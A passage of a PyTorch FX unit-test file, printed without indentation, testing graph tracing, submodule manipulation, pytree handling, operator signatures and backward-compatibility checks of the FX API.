traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit])
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit])
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test assert custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@skipIfNoTorchVision
def test_cpatcher(self):
cnt = 0
def patched_impl(to_patch, args, kwargs):
nonlocal cnt
cnt += 1
return to_patch(*args, **kwargs)
c_patch_enabled = True
def patched_in(to_patch, args, kwargs):
nonlocal c_patch_enabled
try:
c_patch_enabled = False
r = patched_impl(to_patch, args, kwargs)
finally:
c_patch_enabled = True
return r
def trace_func(frame, action, arg):
if action == 'c_call':
if c_patch_enabled:
torch._C._fx.patch_function(arg, patched_in)
import torch
rn = torchvision_models.resnet18()
try:
sys.setprofile(trace_func)
rn(torch.rand(1, 3, 224, 224))
print("testing print patch")
finally:
sys.setprofile(None)
assert(cnt != 0)
def test_randn(self):
def f():
return torch.randn(3, 3)
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=False)
assert(all(i.target != torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
# Sorted and one entry on each line to minimize merge conflicts.
known_no_schema = {'block_diag',
'broadcast_tensors',
'cdist',
'contiguous',
'dstack',
'einsum',
'expand',
'expand_as',
'fill_',
'hstack',
'igamma',
'igammac',
'linalg.multi_dot',
'lu',
'norm',
'polygamma',
'special.polygamma',
'repeat',
'reshape_as',
'resize_',
'resize_as_',
'special.zeta',
'stack',
'to_sparse',
'view',
'view_as',
'nn.functional.hardshrink',
'vstack',
'where',
'zero_',
'__getitem__',
'__radd__',
'__rsub__',
'__rmul__',
'__rdiv__',
'__rmod__',
'__rpow__',
'__rand__',
'__ror__',
'__rxor__',
'__rmatmul__'}
try:
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
except Exception as e:
assert op.name in known_no_schema or "nn.functional" in op.name
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
self.maxDiff = None
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually since
serialization for `inspect.Signature` objects is not stable across
python versions
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_val_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
def _annotation_type_to_stable_str(self, t, sig_str):
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.'
f'Please add support for this type and confirm with the '
f'FX team that your signature change is valid.')
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"hardshrink": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
